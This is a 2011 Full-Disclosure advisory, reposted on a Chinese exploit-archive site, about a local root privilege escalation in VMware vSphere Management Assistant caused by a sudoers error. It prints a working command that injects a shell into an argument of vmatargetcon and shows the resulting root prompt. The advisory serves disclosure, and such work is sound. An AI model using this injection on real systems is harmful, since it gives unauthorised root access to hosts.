Vmware vSphere Management Assistant (vMA) Privilege Escalation

		当前位置：主页>安全文章>文章资料>Exploits>文章内容

Vmware vSphere Management Assistant (vMA) Privilege Escalation

来源： http://secunia.com 作者：drk1wi 发布时间：2011-05-17

=======================================================================
Vmware vSphere Management Assistant (vMA) - Local Privilege Escalation
=======================================================================

Affected Software : Vmware vSphere Management Assistant (vMA)
Severity          : Medium
Local/Remote      : Local
Author            : @drk1wi

[Summary]

Due to an error in the /etc/sudoers file it is possible to run 
arbitrary shell commands within the context of root user.

[Vulnerability Details]

[vi-admin@vMA ~]$ sudo /usr/bin/vmatargetcon --shell=/bin/bash 
"'raz';/bin/bash;"
35|ERROR|1|Unable to resolve hostname.
[root@vMA vi-admin]#

[Time-line]

27/04/2010 - Vendor notified
28/04/2010 - Vendor response
???        - Vendor patch release
16/05/2011 - Public disclosure

[Fix Information]

Edit the /etc/sudoers file.

Cheers,
@drk1wi

_______________________________________________
Full-Disclosure - We believe in it.
Charter: http://lists.grok.org.uk/full-disclosure-charter.html
Hosted and sponsored by Secunia - http://secunia.com/

[

推荐] [

评论(0条)] [返回顶部] [打印本页] [关闭窗口]

匿名评论

评论内容：(不能超过250字，需审核后才会公布，请自觉遵守互联网相关政策法规。

§最新评论：

热点文章

·CVE-2012-0217 Intel sysret exp
·Linux Kernel 2.6.32 Local Root
·Array Networks vxAG / xAPV Pri
·Novell NetIQ Privileged User M
·Array Networks vAPV / vxAG Cod
·Excel SLYK Format Parsing Buff
·PhpInclude.Worm - PHP Scripts
·Apache 2.2.0 - 2.2.11 Remote e
·VideoScript 3.0 <= 4.0.1.50 Of
·Yahoo! Messenger Webcam 8.1 Ac
·Family Connections <= 1.8.2 Re
·Joomla Component EasyBook 1.1

推荐广告